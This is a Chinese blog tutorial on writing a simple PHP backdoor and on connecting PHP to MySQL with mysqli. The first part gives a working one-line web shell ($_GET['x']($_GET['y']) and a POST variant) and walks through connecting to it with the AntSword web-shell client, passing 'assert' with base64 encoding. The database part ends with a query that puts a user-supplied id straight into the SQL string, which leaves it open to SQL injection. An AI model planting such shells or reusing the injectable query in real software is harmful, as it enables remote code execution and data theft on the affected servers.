php简单后门实现及php连接数据库

php简单后门实现

代码

php 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>easybackdoor</title>
</head>
<body>
    <?php
        $_GET['x']($_GET['y']);
    
    ?>
    
</body>
</html>

效果

使用蚁剑连接

php 复制代码
  <?php
        $_GET['x']($_POST['y']);
    ?>

使用hackbar传参,前面传assert

添加蚁剑数据,需要选择base64

连接成功

php连接数据库

相关函数

函数名 作用
mysqli_connect() 与MySQL 数据库建立连接。
mysqli_close() 关闭与MYSQL 数据库建立的连接。
mysqli_connect_errno() 与MySQL 数据库建立连接时,发生错误时的错误编号。
mysqli_connect_error() 与MySQL 数据库建立连接时,发生错误时的错误信息。
mysqli_query() 执行SQL 语句。
mysqli_errno() 执行SQL 语句时,发生错误的编号。
mysqli_error() 执行SQL 语句时,发生错误的信息。
mysqli_fetch_assoc() 从结果集对象中取数据,按条取数据。
函数 说明
mysqli_fetch_row() 以索引数组的方式获取一条记录的数据
mysqli_fetch_assoc() 以关联数组的方式获取一条记录的数据
mysqli_fetch_array() 以索引数组或关联数组的方式获取一条记录的数据
mysqli_fetch_all() 以索引数组或关联数组的方式获取全部记录的数据
mysqli_num_rows() 获取结果集对象中数据条数
mysqli_free_result() 释放与一个结果集合相关的内存

交互过程

  • 建立与MySQL 链接。
  • 执行SQL 语句,返回结果集对象。
  • 从结果集对象中取数据。
  • 关闭与MySQL 链接

建立链接

php 复制代码
$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "bbs";

$link = @mysqli_connect($db_host, $db_user, $db_pass, $db_name);

如果链接成功,返回object(mysqli)1;否则,返回bool(false)。

$link 是对象类型的变量,相当于一个"令牌"。

捕获连接错误
  • 错误编号
  • 错误详情
php 复制代码
if(!$link){
    exit("[".mysqli_connect_errno()."] ".mysqli_connect_error());
}

关闭链接

php 复制代码
mysqli_close($link);

执行SQL

单条SQL 语句执行
php 复制代码
$sql = "select * from users1;";

$results =  mysqli_query($link, $sql);

如果SQL 语句正常执行,就会返回对象类型object(mysqli_result)#2 的数据;否则,bool(false)。

对于insert,delete,update 等不会返回数据的SQL 语句,在执行没有错误时将返回true。对于返回数据的SQL 语句执行成功的时候会返回结果集对象,可以使用操作结果集对象的函数来从中获取数据。

SQL 错误

如果在执行SQL 语句的时候发生错误,mysqli_query 将返回false。可以使用以下函数捕获错误原因:

php 复制代码
if(!$results){
    exit("[".mysqli_errno($link)."] ".mysqli_error($link));
}

完整代码实现

执行结果,遍历输出该表并写入表格

php 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mysqlconnect</title>
</head>
<body>
    <?php
        $db_host="127.0.0.1";
        $db_user="root";
        $db_pass="root";
        $db_name="bbs";

        $link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);
        
        if(!$link){
            echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();
            exit();
        }else{
            echo "link access";
        }

        $sql="select * from message;";
        $results=mysqli_query($link,$sql);
        if(!$results){
            echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);
        }
        echo "<table border=2>";
        echo "<tr><td>id</td><td>uid</td>
              <td>title</td><td>content</td></tr>";
        while($result=mysqli_fetch_assoc($results)){
            echo "<tr>";
            foreach($result as $k => $v){
                echo "<td>";
                echo $v;
                echo "</td>";
            }
            echo "</tr>";
        }
        
        echo "</table>";
        mysqli_close($link); 

    ?>
    
</body>
</html>

可以实现根据id查询到数控,并且返回的有用户名了

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>mysqlconnect</title>
</head>
<body>
    <?php
        $db_host="127.0.0.1";
        $db_user="root";
        $db_pass="root";
        $db_name="bbs";

        $link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);
        
        if(!$link){
            echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();
            exit();
        }else{
            echo "link access";
        }
        $id=isset($_REQUEST['id'])?$_REQUEST['id']:1;
       
        $sql="select m.id,u.username,m.title,m.content from message m,user u where u.id=m.uid and m.id=$id;";
        $results=mysqli_query($link,$sql);
        if(!$results){
            echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);
        }
        echo "<table border=2>";
        echo "<tr><td>id</td><td>username</td>
              <td>title</td><td>content</td></tr>";
        while($result=mysqli_fetch_assoc($results)){
            echo "<tr>";
            foreach($result as $k => $v){
                echo "<td>";
                echo $v;
                echo "</td>";
            }
            echo "</tr>";
        }
        
        echo "</table>";
        mysqli_close($link); 

    ?>
    
</body>
</html>
相关推荐
清水白石0081 小时前
从一个“支付状态不一致“的bug,看大型分布式系统的“隐藏杀机“
java·数据库·bug
Elihuss2 小时前
ONVIF协议操作摄像头方法
开发语言·php
Swift社区5 小时前
在 Swift 中实现字符串分割问题:以字典中的单词构造句子
开发语言·ios·swift
没头脑的ht5 小时前
Swift内存访问冲突
开发语言·ios·swift
没头脑的ht5 小时前
Swift闭包的本质
开发语言·ios·swift
wjs20245 小时前
Swift 数组
开发语言
Python私教5 小时前
model中能定义字段声明不存储到数据库吗
数据库·oracle
stm 学习ing6 小时前
FPGA 第十讲 避免latch的产生
c语言·开发语言·单片机·嵌入式硬件·fpga开发·fpga
湫ccc7 小时前
《Python基础》之字符串格式化输出
开发语言·python